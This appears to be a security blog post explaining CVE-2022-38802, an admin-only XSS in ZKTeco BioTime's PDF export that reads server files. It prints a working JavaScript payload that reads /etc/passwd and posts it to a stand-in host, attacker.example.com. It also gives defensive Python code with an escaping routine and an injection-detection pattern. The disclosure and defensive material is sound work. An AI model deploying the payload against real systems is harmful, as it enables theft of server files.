Zkteco BioTime, a popular biometric attendance system, has a critical security vulnerability in versions older than 8.5.3 Build:20200816.447 that allows an authenticated administrator to exploit incorrect access control via the resign, private message, manual log, time interval, attshift, and holiday features. By leveraging an XSS vulnerability within the application's PDF generator, an attacker can read sensitive local files when exporting data as a PDF. This blog post aims to provide a clear understanding of this exploit (CVE-2022-38802), including code snippets, original references, and detailed explanations.

Details

The Zkteco BioTime system is vulnerable to an incorrect access control exploit due to improper handling of user privileges in certain features like resign, private message, manual log, time interval, attshift, and holiday functionalities. This vulnerability can be exploited by attackers who have administrative access to the application.

An attacker with administrator rights can carry out an XSS attack by injecting JavaScript into specific input fields of these features; the script is executed when the data is exported as a PDF. Because it runs inside the server-side engine that renders the export, rather than in a user's browser, a request for a local path is resolved against the server's own filesystem. As a result, the attacker can read sensitive local files from the server, exposing confidential information and potentially providing a foothold for taking control of the system.

Exploit

Below is a code snippet demonstrating how to exploit the XSS vulnerability in the PDF export function of Zkteco BioTime:

// Malicious JavaScript code injection
<script>
  // XMLHttpRequest to read local files
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      // Send the file content to a remote server
      var remote = new XMLHttpRequest();
      remote.open("POST", "https://attacker.example.com/data", true);
      remote.send(xhr.responseText);
    }
  }

  // Target local file to read
  xhr.open("GET", "/etc/passwd", true);
  xhr.send();
</script>

The above malicious JavaScript uses XMLHttpRequest to read a local file on the target system, in this case '/etc/passwd'. Once the PDF renderer executes it, the script fetches the file's contents and posts them to a remote server controlled by the attacker at 'https://attacker.example.com/data'.

References

1. Original Advisory: https://nvd.nist.gov/vuln/detail/CVE-2022-38802
2. Zkteco BioTime: https://www.zkteco.com/en/product_detail/betime.html
3. Cross-Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

To defend against this exploit, users of Zkteco BioTime should take the following steps:

1. Update the Zkteco BioTime software to the latest version (>= 8.5.3 Build:20200816.447), available from the vendor's website at https://www.zkteco.com/en.
2. Be cautious when granting access to other users, ensuring that only trusted individuals hold administrative rights.
3. Regularly monitor application logs for suspicious activity or attempts to exploit vulnerabilities.
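The two defensive measures this post implies, escaping user-supplied text before it reaches the HTML-to-PDF renderer (the fix for the injection described in the Details section) and scanning stored records for injection attempts (step 3 above), are shown together below. This is an added example written for this post; it is not ZKTeco code. The field names (remark, reason, message, name), the record layout and the sample records are all constructed assumptions, not BioTime's real schema or data.

```python
"""
Defender-side checks for script injection in attendance-system export data.
Added example, not ZKTeco code; field names, record layout and sample data
are assumptions.
"""
import html
import re
from typing import Dict, Iterable, List

# Free-text fields an administrator can edit in the affected features
# (resign, private message, manual log, time interval, attshift, holiday).
# Hypothetical names: BioTime's real schema is not covered here.
USER_SUPPLIED_FIELDS = ("remark", "reason", "message", "name")

# Content that has no business in an attendance remark and signals an
# attempt to get script executed by an HTML-based PDF renderer.
_SUSPICIOUS = re.compile(
    r"<\s*(script|iframe|object|embed)\b"          # script-bearing tags
    r"|javascript\s*:"                              # javascript: URLs
    r"|\bon(load|error|click|mouseover)\s*="        # inline event handlers
    r"|file\s*:/"                                   # local file scheme
    r"|/etc/passwd",                                # classic read target
    re.IGNORECASE,
)

# Constructed sample export records: one benign, one injected, one benign.
SAMPLE_RECORDS = [
    {"id": "101", "name": "A. Example", "remark": "Resigned, moving abroad"},
    {"id": "102", "name": "B. Example", "remark": "<script>alert(1)</script>"},
    {"id": "103", "name": "C. Example", "remark": "Holiday swap approved"},
]


def escape_for_pdf(value: str) -> str:
    """HTML-escape a user-supplied field before it is placed in the HTML that
    the PDF renderer consumes. '<script>' becomes '&lt;script&gt;', which the
    renderer prints as literal text instead of executing."""
    return html.escape(value, quote=True)


def sanitize_record(record: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of a record with every user-supplied field escaped;
    non-user fields such as the id pass through unchanged."""
    return {
        key: (escape_for_pdf(val) if key in USER_SUPPLIED_FIELDS else val)
        for key, val in record.items()
    }


def render_export_html(records: Iterable[Dict[str, str]]) -> str:
    """Build the HTML table handed to the PDF renderer, escaping at the boundary.
    This is the hardened counterpart of an export that concatenates raw fields."""
    rows = []
    for rec in records:
        safe = sanitize_record(rec)
        rows.append(
            "<tr><td>%s</td><td>%s</td><td>%s</td></tr>"
            % (safe.get("id", ""), safe.get("name", ""), safe.get("remark", ""))
        )
    return "<table>" + "".join(rows) + "</table>"


def find_injection_attempts(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Scan stored records (or exported rows pulled from logs) and return one
    finding per record whose user-supplied fields match an injection pattern.
    Run this over existing data after patching: a payload planted before the
    update is still stored and will be rendered by every later export."""
    findings = []
    for rec in records:
        for field in USER_SUPPLIED_FIELDS:
            match = _SUSPICIOUS.search(rec.get(field, ""))
            if match:
                findings.append(
                    {"id": rec.get("id", "?"), "field": field, "match": match.group(0)}
                )
                break  # one finding per record is enough to trigger review
    return findings


if __name__ == "__main__":
    for finding in find_injection_attempts(SAMPLE_RECORDS):
        print("record %(id)s field %(field)s contains %(match)r" % finding)
    print(render_export_html(SAMPLE_RECORDS))
```

Escaping at the point where fields are written into the renderer's HTML is the change that actually closes the hole; the pattern scan is a review aid for finding payloads that were stored before the patch, and it will miss encodings it does not list. Independently of both, the HTML-to-PDF engine should run with JavaScript and local file access disabled; how that is configured depends on the engine in use and is not covered here.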

Conclusion

CVE-2022-38802 highlights the importance of keeping software up-to-date and the potential risks associated with the incorrect handling of user access controls. By understanding the exploit details, code snippets, and original references, administrators and developers can better protect their environments and users from security breaches. Updating to the latest Zkteco BioTime version and implementing the recommended security measures will mitigate the risks associated with this vulnerability.

Timeline

Published on: 11/30/2022 14:15:00 UTC
Last modified on: 12/02/2022 17:18:00 UTC